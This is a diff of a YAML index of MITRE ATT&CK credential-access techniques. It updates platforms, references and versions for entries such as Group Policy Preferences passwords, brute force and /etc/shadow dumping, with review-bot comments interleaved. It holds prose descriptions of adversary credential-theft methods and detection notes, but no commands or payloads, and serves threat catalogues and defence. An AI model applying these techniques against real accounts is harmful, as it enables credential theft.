+ type: attack-pattern
+ id: attack-pattern--8187bd2a-866f-4457-9009-86b0ddedffa3
+ created: '2020-02-04T13:02:11.685Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1552/003
+ external_id: T1552.003
+ - source_name: External to DA, the OS X Way
+ description: Alex Rymdeko-Harvey, Steve Borosh. (2016, May 14). External to
+ DA, the OS X Way. Retrieved September 12, 2024.
+ url: https://www.slideshare.net/slideshow/external-to-da-the-os-x-way/62021418
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1552.003
atomic_tests: []
T1552.001:
technique:
- modified: '2024-04-15T21:33:00.213Z'
+ modified: '2024-10-15T14:28:43.639Z'
name: 'Unsecured Credentials: Credentials In Files'
description: |-
Adversaries may search local file systems and remote file shares for files containing insecurely stored credentials. These can be files created by users to store their own credentials, shared credential stores for a group of individuals, configuration files containing passwords for a system or service, or source code/binary files containing embedded passwords.
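Review bot: the `External to DA, the OS X Way` reference in this hunk updates both the URL (the https `/slideshow/.../62021418` SlideShare path) and the retrieval date to September 12, 2024, which is the right way to record a re-verified live link; the DHCP (`solution_monitor_dhcp_scopes`) and Careto references earlier in the diff instead point at web.archive.org snapshots whose capture dates (20231202, 20141031) are older than their new `Retrieved` dates, so the file now uses the same `Retrieved` wording for live checks and for archive lookups. Consider having the generator distinguish the two. The rest of the hunk is the key reordering already seen for T1555.003, plus the `x_mitre_permissions_required` removal and the `1.1` to `1.2` bump.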
@@ -46342,7 +47100,6 @@ credential-access:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1552.001
atomic_tests: []
T1606.001:
@@ -46404,11 +47161,10 @@ credential-access:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1528:
technique:
- modified: '2024-03-24T19:41:54.832Z'
+ modified: '2024-10-14T22:11:30.271Z'
name: Steal Application Access Token
description: "Adversaries can steal application access tokens as a means of
acquiring credentials to access remote systems and resources.\n\nApplication
@@ -46457,6 +47213,7 @@ credential-access:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: credential-access
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- Suzy Schapperle - Microsoft Azure Red Team
- Shailesh Tiwary (Indian Army)
@@ -46465,6 +47222,7 @@ credential-access:
- Saisha Agrawal, Microsoft Threat Intelligent Center (MSTIC)
- Ram Pliskin, Microsoft Azure Security Center
- Jack Burns, HubSpot
+ - Arun Seelagan, CISA
x_mitre_deprecated: false
x_mitre_detection: |-
Administrators should set up monitoring to trigger automatic alerts when policy criteria are met. For example, using a Cloud Access Security Broker (CASB), admins can create a “High severity app permissions” policy that generates alerts if apps request high severity permissions or send permissions requests for too many users.
@@ -46475,13 +47233,14 @@ credential-access:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: false
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- SaaS
- - Office 365
- - Azure AD
- - Google Workspace
- Containers
- x_mitre_version: '1.3'
+ - IaaS
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '1.4'
x_mitre_data_sources:
- 'Active Directory: Active Directory Object Modification'
- 'User Account: User Account Modification'
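Review bot: the platform list at L52311-52318 replaces the literals `Office 365`, `Azure AD` and `Google Workspace` with `IaaS`, `Office Suite` and `Identity Provider`; any per-platform index that is built by filtering on the old literal names will silently drop T1528 (and every other object in this change that gets the same rename), so the platform-specific indexes should be regenerated and diffed against the previous output in the same change.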
@@ -46537,44 +47296,11 @@ credential-access:
url: https://docs.microsoft.com/en-us/azure/active-directory/develop/active-directory-v2-protocols
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.2.0
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1528
atomic_tests: []
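Review bot: the removals of `x_mitre_attack_spec_version` and `x_mitre_modified_by_ref` at L52327-52328 are matched by re-additions at L52292 and L52308, so this hunk is key reordering by the serializer rather than a content change; the same pattern repeats in every object below, and emitting keys in a stable order from the generator would keep future diffs reviewable.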
T1552.006:
technique:
- x_mitre_platforms:
- - Windows
- x_mitre_domains:
- - enterprise-attack
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--8d7bd4f5-3a89-4453-9c82-2c8894d5655e
- type: attack-pattern
- created: '2020-02-11T18:43:06.253Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1552.006
- url: https://attack.mitre.org/techniques/T1552/006
- - source_name: Microsoft GPP 2016
- url: https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/dn581922(v%3Dws.11)
- description: Microsoft. (2016, August 31). Group Policy Preferences. Retrieved
- March 9, 2020.
- - url: https://msdn.microsoft.com/library/cc422924.aspx
- description: Microsoft. (n.d.). 2.2.1.1.4 Password Encryption. Retrieved April
- 11, 2018.
- source_name: Microsoft GPP Key
- - url: https://obscuresecurity.blogspot.co.uk/2012/05/gpp-password-retrieval-with-powershell.html
- description: Campbell, C. (2012, May 24). GPP Password Retrieval with PowerShell.
- Retrieved April 11, 2018.
- source_name: Obscuresecurity Get-GPPPassword
- - description: Sean Metcalf. (2015, December 28). Finding Passwords in SYSVOL
- & Exploiting Group Policy Preferences. Retrieved February 17, 2020.
- url: https://adsecurity.org/?p=2288
- source_name: ADSecurity Finding Passwords in SYSVOL
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2024-08-15T13:21:22.734Z'
name: 'Unsecured Credentials: Group Policy Preferences'
description: |
Adversaries may attempt to find unsecured credentials in Group Policy Preferences (GPP). GPP are tools that allow administrators to create domain policies with embedded credentials. These policies allow administrators to set local accounts.(Citation: Microsoft GPP 2016)
@@ -46591,25 +47317,54 @@ credential-access:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: credential-access
+ x_mitre_deprecated: false
x_mitre_detection: "Monitor for attempts to access SYSVOL that involve searching
for XML files. \n\nDeploy a new XML file with permissions set to Everyone:Deny
and monitor for Access Denied errors.(Citation: ADSecurity Finding Passwords
in SYSVOL)"
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - Windows
+ x_mitre_version: '1.1'
x_mitre_data_sources:
- 'File: File Access'
- 'Command: Command Execution'
- x_mitre_permissions_required:
- - User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--8d7bd4f5-3a89-4453-9c82-2c8894d5655e
+ created: '2020-02-11T18:43:06.253Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1552/006
+ external_id: T1552.006
+ - source_name: Obscuresecurity Get-GPPPassword
+ description: Campbell, C. (2012, May 24). GPP Password Retrieval with PowerShell.
+ Retrieved April 11, 2018.
+ url: https://obscuresecurity.blogspot.co.uk/2012/05/gpp-password-retrieval-with-powershell.html
+ - source_name: Microsoft GPP 2016
+ description: Microsoft. (2016, August 31). Group Policy Preferences. Retrieved
+ March 9, 2020.
+ url: https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/dn581922(v%3Dws.11)
+ - source_name: Microsoft GPP Key
+ description: Microsoft. (n.d.). 2.2.1.1.4 Password Encryption. Retrieved April
+ 11, 2018.
+ url: https://msdn.microsoft.com/library/cc422924.aspx
+ - source_name: ADSecurity Finding Passwords in SYSVOL
+ description: Sean Metcalf. (2015, December 28). Finding Passwords in SYSVOL
+ & Exploiting Group Policy Preferences. Retrieved February 17, 2020.
+ url: https://adsecurity.org/?p=2288
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1552.006
atomic_tests: []
T1556.008:
technique:
- modified: '2023-10-31T14:00:00.188Z'
+ modified: '2023-05-04T18:02:51.318Z'
name: Network Provider DLL
description: "Adversaries may register malicious network provider dynamic link
libraries (DLLs) to capture cleartext user credentials during the authentication
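Review bot: `x_mitre_permissions_required: - User` is dropped at L52389-52390 with no replacement, which is the one genuine content change in an otherwise reordered T1552.006 object; confirm no consumer reads that field. Also, the `modified` timestamp for T1556.008 moves backwards at L52426-52427 (2023-10-31 to 2023-05-04) while every other object in this change moves forward, which suggests this object was taken from an older bundle than the rest.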
@@ -46684,11 +47439,10 @@ credential-access:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1606:
technique:
- modified: '2023-10-15T11:10:03.428Z'
+ modified: '2024-10-15T15:58:23.638Z'
name: Forge Web Credentials
description: "Adversaries may forge credential materials that can be used to
gain access to web applications or Internet services. Web applications and
@@ -46732,11 +47486,10 @@ credential-access:
- Windows
- macOS
- Linux
- - Azure AD
- - Office 365
- - Google Workspace
- IaaS
- x_mitre_version: '1.4'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '1.5'
x_mitre_data_sources:
- 'Web Credential: Web Credential Usage'
- 'Web Credential: Web Credential Creation'
@@ -46760,8 +47513,8 @@ credential-access:
url: https://unit42.paloaltonetworks.com/mac-malware-steals-cryptocurrency-exchanges-cookies/
- source_name: GitHub AWS-ADFS-Credential-Generator
description: Damian Hickey. (2017, January 28). AWS-ADFS-Credential-Generator.
- Retrieved December 16, 2020.
- url: https://github.com/damianh/aws-adfs-credential-generator
+ Retrieved September 27, 2024.
+ url: https://github.com/pvanbuijtene/aws-adfs-credential-generator
- source_name: Microsoft SolarWinds Customer Guidance
description: MSRC. (2020, December 13). Customer Guidance on Recent Nation-State
Cyber Attacks. Retrieved December 17, 2020.
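Review bot: the reference URL at L52464/L52466 now points at a different GitHub owner (`damianh` to `pvanbuijtene`) while the description at L52462 still credits Damian Hickey, 2017; if this index is meant to mirror the upstream ATT&CK data, confirm the new URL and the updated retrieval date come from the bundle and are not a manual fork substitution.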
@@ -46777,11 +47530,10 @@ credential-access:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1621:
technique:
- modified: '2024-04-19T04:26:29.365Z'
+ modified: '2024-10-14T22:11:30.271Z'
name: Multi-Factor Authentication Request Generation
description: |-
Adversaries may attempt to bypass multi-factor authentication (MFA) mechanisms and gain access to accounts by generating MFA requests sent to users.
@@ -46792,11 +47544,13 @@ credential-access:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: credential-access
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- Jon Sternstein, Stern Security
- Pawel Partyka, Microsoft 365 Defender
- Shanief Webb
- Obsidian Security
+ - Arun Seelagan, CISA
x_mitre_deprecated: false
x_mitre_detection: 'Monitor user account logs as well as 2FA/MFA application
logs for suspicious events: unusual login attempt source location, mismatch
@@ -46806,16 +47560,16 @@ credential-access:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: false
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
- - Office 365
- Linux
- macOS
- IaaS
- SaaS
- - Azure AD
- - Google Workspace
- x_mitre_version: '1.1'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '1.2'
x_mitre_data_sources:
- 'User Account: User Account Authentication'
- 'Logon Session: Logon Session Metadata'
@@ -46853,13 +47607,10 @@ credential-access:
url: https://www.obsidiansecurity.com/blog/behind-the-breach-self-service-password-reset-azure-ad/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.2.0
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1552.008:
technique:
- modified: '2023-04-11T00:34:00.779Z'
+ modified: '2024-10-14T22:11:30.271Z'
name: Chat Messages
description: |-
Adversaries may directly collect unsecured credentials stored or passed through user communication services. Credentials may be sent and stored in user chat communication applications such as email, chat services like Slack or Teams, collaboration tools like Jira or Trello, and any other services that support user communication. Users may share various forms of credentials (such as usernames and passwords, API keys, or authentication tokens) on private or public corporate internal communications channels.
@@ -46868,6 +47619,7 @@ credential-access:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: credential-access
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- Douglas Weir
x_mitre_deprecated: false
@@ -46875,11 +47627,11 @@ credential-access:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- - Office 365
- SaaS
- - Google Workspace
- x_mitre_version: '1.0'
+ - Office Suite
+ x_mitre_version: '1.1'
x_mitre_data_sources:
- 'Application Log: Application Log Content'
type: attack-pattern
@@ -46897,13 +47649,10 @@ credential-access:
url: https://www.nightfall.ai/blog/saas-slack-security-risks-2020
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1212:
technique:
- modified: '2023-10-15T11:45:21.555Z'
+ modified: '2024-10-14T22:11:30.271Z'
name: Exploitation for Credential Access
description: |-
Adversaries may exploit software vulnerabilities in an attempt to collect credentials. Exploitation of a software vulnerability occurs when an adversary takes advantage of a programming error in a program, service, or within the operating system software or kernel itself to execute adversary-controlled code.
@@ -46916,6 +47665,7 @@ credential-access:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: credential-access
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- John Lambert, Microsoft Threat Intelligence Center
- Mohit Rathore
@@ -46929,12 +47679,13 @@ credential-access:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: false
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Linux
- Windows
- macOS
- - Azure AD
- x_mitre_version: '1.5'
+ - Identity Provider
+ x_mitre_version: '1.6'
x_mitre_data_sources:
- 'User Account: User Account Authentication'
- 'Process: Process Creation'
@@ -46966,17 +47717,14 @@ credential-access:
url: https://www.microsoft.com/en-us/security/blog/2023/07/14/analysis-of-storm-0558-techniques-for-unauthorized-email-access/
- source_name: Microsoft Midnight Blizzard Replay Attack
description: Microsoft Threat Intelligence. (2023, June 21). Credential Attacks.
- Retrieved September 27, 2023.
- url: https://twitter.com/MsftSecIntel/status/1671579359994343425
+ Retrieved September 12, 2024.
+ url: https://x.com/MsftSecIntel/status/1671579359994343425
- source_name: Technet MS14-068
description: Microsoft. (2014, November 18). Vulnerability in Kerberos Could
Allow Elevation of Privilege (3011780). Retrieved December 23, 2015.
url: https://technet.microsoft.com/en-us/library/security/ms14-068.aspx
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.2.0
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1056.002:
technique:
@@ -47049,12 +47797,11 @@ credential-access:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1056.002
atomic_tests: []
T1110:
technique:
- modified: '2024-01-29T18:53:26.593Z'
+ modified: '2024-10-14T22:11:30.271Z'
name: Brute Force
description: |-
Adversaries may use brute force techniques to gain access to accounts when passwords are unknown or when password hashes are obtained.(Citation: TrendMicro Pawn Storm Dec 2020) Without knowledge of the password for an account or set of accounts, an adversary may systematically guess the password using a repetitive or iterative mechanism.(Citation: Dragos Crashoverride 2018) Brute forcing passwords can take place via interaction with a service that will check the validity of those credentials or offline against previously acquired credential data, such as password hashes.
@@ -47063,6 +47810,7 @@ credential-access:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: credential-access
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- David Fiser, @anu4is, Trend Micro
- Alfredo Oliveira, Trend Micro
@@ -47081,18 +47829,18 @@ credential-access:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: false
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
- - Azure AD
- - Office 365
- SaaS
- IaaS
- Linux
- macOS
- - Google Workspace
- Containers
- Network
- x_mitre_version: '2.5'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '2.6'
x_mitre_data_sources:
- 'User Account: User Account Authentication'
- 'Command: Command Execution'
@@ -47116,13 +47864,10 @@ credential-access:
url: https://www.dragos.com/wp-content/uploads/CRASHOVERRIDE2018.pdf
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.2.0
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1110.004:
technique:
- modified: '2024-03-07T14:28:02.910Z'
+ modified: '2024-10-14T22:11:30.271Z'
name: 'Brute Force: Credential Stuffing'
description: |-
Adversaries may use credentials obtained from breach dumps of unrelated accounts to gain access to target accounts through credential overlap. Occasionally, large numbers of username and password pairs are dumped online when a website or service is compromised and the user account credentials accessed. The information may be useful to an adversary attempting to compromise accounts by taking advantage of the tendency for users to use the same passwords across personal and business accounts.
@@ -47148,6 +47893,7 @@ credential-access:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: credential-access
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- Diogo Fernandes
- Anastasios Pingios
@@ -47159,18 +47905,18 @@ credential-access:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
- - Azure AD
- - Office 365
- SaaS
- IaaS
- Linux
- macOS
- - Google Workspace
- Containers
- Network
- x_mitre_version: '1.5'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '1.6'
x_mitre_data_sources:
- 'Application Log: Application Log Content'
- 'User Account: User Account Authentication'
@@ -47189,14 +47935,11 @@ credential-access:
url: https://www.us-cert.gov/ncas/alerts/TA18-086A
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.2.0
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1110.004
atomic_tests: []
T1556.006:
technique:
- modified: '2024-04-16T00:20:21.488Z'
+ modified: '2024-10-14T22:11:30.271Z'
name: Multi-Factor Authentication
description: "Adversaries may disable or modify multi-factor authentication
(MFA) mechanisms to enable persistent access to compromised accounts.\n\nOnce
@@ -47225,24 +47968,26 @@ credential-access:
phase_name: defense-evasion
- kill_chain_name: mitre-attack
phase_name: persistence
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- Liran Ravich, CardinalOps
- Muhammad Moiz Arshad, @5T34L7H
+ - Arun Seelagan, CISA
x_mitre_deprecated: false
x_mitre_detection: ''
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
- - Azure AD
- - Office 365
- SaaS
- IaaS
- - Google Workspace
- Linux
- macOS
- x_mitre_version: '1.2'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '1.3'
x_mitre_data_sources:
- 'Logon Session: Logon Session Creation'
- 'Application Log: Application Log Content'
@@ -47277,13 +48022,10 @@ credential-access:
url: https://docs.microsoft.com/en-us/azure/active-directory/governance/conditional-access-exclusion
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.2.0
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1187:
technique:
- modified: '2023-08-14T19:30:45.123Z'
+ modified: '2024-10-15T16:33:34.508Z'
name: Forced Authentication
description: |-
Adversaries may gather credential material by invoking or forcing a user to automatically provide authentication information through a mechanism in which they can intercept.
@@ -47361,14 +48103,13 @@ credential-access:
url: https://en.wikipedia.org/wiki/Server_Message_Block
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1187
atomic_tests: []
T1056:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2024-08-13T17:33:45.244Z'
name: Input Capture
description: Adversaries may use methods of capturing user input to obtain credentials
or collect information. During normal system usage, users often provide credentials
@@ -47384,6 +48125,7 @@ credential-access:
phase_name: credential-access
x_mitre_contributors:
- John Lambert, Microsoft Threat Intelligence Center
+ x_mitre_deprecated: false
x_mitre_detection: 'Detection may vary depending on how input is captured but
may include monitoring for certain Windows API calls (e.g. `SetWindowsHook`,
`GetKeyState`, and `GetAsyncKeyState`)(Citation: Adventures of a Keystroke),
@@ -47392,13 +48134,13 @@ credential-access:
keylogging or API hooking are present.'
x_mitre_domains:
- enterprise-attack
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_is_subtechnique: false
x_mitre_platforms:
- Linux
- macOS
- Windows
- Network
- x_mitre_version: '1.2'
+ x_mitre_version: '1.3'
x_mitre_data_sources:
- 'File: File Modification'
- 'Process: Process Creation'
@@ -47406,15 +48148,11 @@ credential-access:
- 'Process: Process Metadata'
- 'Process: OS API Execution'
- 'Driver: Driver Load'
- x_mitre_permissions_required:
- - Administrator
- - SYSTEM
- - root
- - User
type: attack-pattern
id: attack-pattern--bb5a00de-e086-4859-a231-fa793f6797e2
created: '2017-05-31T21:30:48.323Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
external_references:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1056
@@ -47425,9 +48163,8 @@ credential-access:
url: http://opensecuritytraining.info/Keylogging_files/The%20Adventures%20of%20a%20Keystroke.pdf
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
- x_mitre_is_subtechnique: false
- spec_version: '2.1'
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
T1557.002:
technique:
@@ -47473,7 +48210,7 @@ credential-access:
The ARP protocol is stateless and does not require authentication. Therefore, devices may wrongly add or update the MAC address of the IP address in their ARP cache.(Citation: Sans ARP Spoofing Aug 2003)(Citation: Cylance Cleaver)
Adversaries may use ARP cache poisoning as a means to intercept network traffic. This activity may be used to collect and/or relay data such as credentials, especially those sent over an insecure, unencrypted protocol.(Citation: Sans ARP Spoofing Aug 2003)
- modified: '2022-11-08T14:00:00.188Z'
+ modified: '2022-07-22T18:37:22.176Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: ARP Cache Poisoning
x_mitre_detection: "Monitor network traffic for unusual ARP traffic, gratuitous
@@ -47492,17 +48229,16 @@ credential-access:
- 'Network Traffic: Network Traffic Flow'
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1556.009:
technique:
- modified: '2024-04-18T20:53:46.175Z'
+ modified: '2024-09-16T16:54:47.595Z'
name: Conditional Access Policies
description: "Adversaries may disable or modify conditional access policies
to enable persistent access to compromised accounts. Conditional access policies
are additional verifications used by identity providers and identity and access
management systems to determine whether a user should be granted access to
- a resource.\n\nFor example, in Azure AD, Okta, and JumpCloud, users can be
+ a resource.\n\nFor example, in Entra ID, Okta, and JumpCloud, users can be
denied access to applications based on their IP address, device enrollment
status, and use of multi-factor authentication.(Citation: Microsoft Conditional
Access)(Citation: JumpCloud Conditional Access Policies)(Citation: Okta Conditional
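Review bot: T1557.002 keeps `x_mitre_attack_spec_version: 2.1.0` at L52848 and, in the preceding hunk, its `modified` value moves backwards to 2022-07-22 (L52841-52842), whereas every other object in this change is bumped to 3.2.0 with a forward timestamp; this looks like a stale object and is worth checking against the current bundle before merging.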
@@ -47535,10 +48271,9 @@ credential-access:
- enterprise-attack
x_mitre_is_subtechnique: true
x_mitre_platforms:
- - Azure AD
- - SaaS
- IaaS
- x_mitre_version: '1.0'
+ - Identity Provider
+ x_mitre_version: '1.1'
x_mitre_data_sources:
- 'Active Directory: Active Directory Object Modification'
- 'Cloud Service: Cloud Service Modification'
@@ -47575,11 +48310,10 @@ credential-access:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1555.006:
technique:
- modified: '2023-09-30T20:24:19.357Z'
+ modified: '2024-10-15T14:20:16.722Z'
name: Cloud Secrets Management Stores
description: "Adversaries may acquire credentials from cloud-native secret management
solutions such as AWS Secrets Manager, GCP Secret Manager, Azure Key Vault,
@@ -47647,34 +48381,10 @@ credential-access:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1003.008:
technique:
- x_mitre_platforms:
- - Linux
- x_mitre_domains:
- - enterprise-attack
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--d0b4fcdb-d67d-4ed2-99ce-788b12f8c0f4
- type: attack-pattern
- created: '2020-02-11T18:46:56.263Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - url: https://attack.mitre.org/techniques/T1003/008
- external_id: T1003.008
- source_name: mitre-attack
- - description: The Linux Documentation Project. (n.d.). Linux Password and Shadow
- File Formats. Retrieved February 19, 2020.
- url: https://www.tldp.org/LDP/lame/LAME/linux-admin-made-easy/shadow-file-formats.html
- source_name: Linux Password and Shadow File Formats
- - description: 'Vivek Gite. (2014, September 17). Linux Password Cracking: Explain
- unshadow and john Commands (John the Ripper Tool). Retrieved February 19,
- 2020.'
- url: https://www.cyberciti.biz/faq/unix-linux-password-cracking-john-the-ripper/
- source_name: nixCraft - John the Ripper
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2024-09-25T20:48:04.491Z'
name: 'OS Credential Dumping: /etc/passwd, /etc/master.passwd and /etc/shadow'
description: |
Adversaries may attempt to dump the contents of /etc/passwd
and /etc/shadow
to enable offline password cracking. Most modern Linux operating systems use a combination of /etc/passwd
and /etc/shadow
to store user account information including password hashes in /etc/shadow
. By default, /etc/shadow
is only readable by the root user.(Citation: Linux Password and Shadow File Formats)
@@ -47683,20 +48393,42 @@ credential-access:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: credential-access
+ x_mitre_deprecated: false
x_mitre_detection: The AuditD monitoring tool, which ships stock in many Linux
distributions, can be used to watch for hostile processes attempting to access
/etc/passwd
and /etc/shadow
, alerting on the pid,
process name, and arguments of such programs.
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - Linux
+ x_mitre_version: '1.1'
x_mitre_data_sources:
- 'File: File Access'
- 'Command: Command Execution'
- x_mitre_permissions_required:
- - root
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--d0b4fcdb-d67d-4ed2-99ce-788b12f8c0f4
+ created: '2020-02-11T18:46:56.263Z'
